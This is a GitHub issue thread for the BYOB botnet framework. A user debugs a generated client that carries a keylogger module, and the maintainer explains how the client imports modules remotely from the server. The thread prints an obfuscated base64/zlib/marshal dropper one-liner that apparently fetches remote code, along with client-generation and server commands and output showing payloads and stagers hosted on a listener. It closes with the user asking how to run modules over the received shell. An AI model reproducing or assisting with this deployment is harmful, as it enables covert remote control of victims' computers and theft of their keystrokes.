### ISSUE TITLE
Error message with keylogger module

### ISSUE THREAD

**Issue by stevenfonz** [malwaredllc/byob#28]
root@stevelab:~/Documents/github/byob/byob# python byob_jrB.py
Traceback (most recent call last):
  File "byob_jrB.py", line 1, in <module>
    import zlib,base64,marshal,urllib;exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrdmFgYCgtysnJTNIDUvkFqXka6hklJQVW+vqGlkZ6hmYWemZAysDQytDAxMREX7+4JDE9tahYP6vISa+gUl1Tryg1MUVDEwAVWhU4')))))
  File "<string>", line 1
    <head>
    ^
SyntaxError: invalid syntax

any idea how to solve this?

**Comment by malwaredllc** [comment]
What commands did you use to generate the client? I don't see anything about the keylogger module in the traceback.

**Comment by stevenfonz** [comment]
I used the following command.

 python client.py 192.168.62.101 10443 modules/keylogger.py


[>] Modules
        Adding modules... - (4 modules added to client)

[>] Imports
        Adding imports..- - removing _winreg import (33 imports from 4 modules)

[>] Payload
        Uploading payload... - (hosting payload at: http://192.168.62.101:10444//payloads/mgg.py)

[>] Stager                                                                     Uploading stager... - (hosting stager at: http://192.168.62.101:10444//stagers/mgg.py)

[>] Dropper                                                                    Writing dropper...  (saved to file: byob_mgg.py)

root@stevelab:~/Documents/github/byob/byob# python byob_mgg.py
Traceback (most recent call last):
  File "byob_mgg.py", line 1, in <module>
    import zlib,base64,marshal,urllib;exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrdmFgYCgtysnJTNIDUvkFqXka6hklJQVW+vqGlkZ6hmYWemZAysDQytDAxMREX7+4JDE9tahYPzc9Xa+gUl1Tryg1MUVDEwAWzhVV')))))
  File "<string>", line 1
    <head>
    ^
SyntaxError: invalid syntax
root@stevelab:~/Documents/github/byob/byob#


At server side, i used 

root@stevelab:~/Documents/github/byob/byob# python server.py --host 192.168.62.101 --port 10443

**Comment by malwaredllc** [comment]
I see the problem.

Python scripts/modules in `byob/modules/` do not need to be manually added when generating a client. 

All python scripts/modules in `byob/modules/` are automatically usable by every client by default, because the client uses a hacked version of python's import mechanism to remotely import modules from the server.

The `[module]`argument in the client generator is designed to enable users to easily include any *other* python scripts/modules in the client by simply adding the path to the file as a positional argument. 

When the `[module]` argument is invoked, the client generator simply copies the script/module to `byob/modules/`, making it remotely importable + usable for all existing clients and future clients.

Hopefully this explanation helps clarify the issue. Please feel free to ask any further questions you may have.

**Comment by stevenfonz** [comment]
Sorry, I am still confused with your readme. I have generated a new client without specifying the modules and it's work. thank you.

But after I received the shell from the client, how do i call the module from the server?
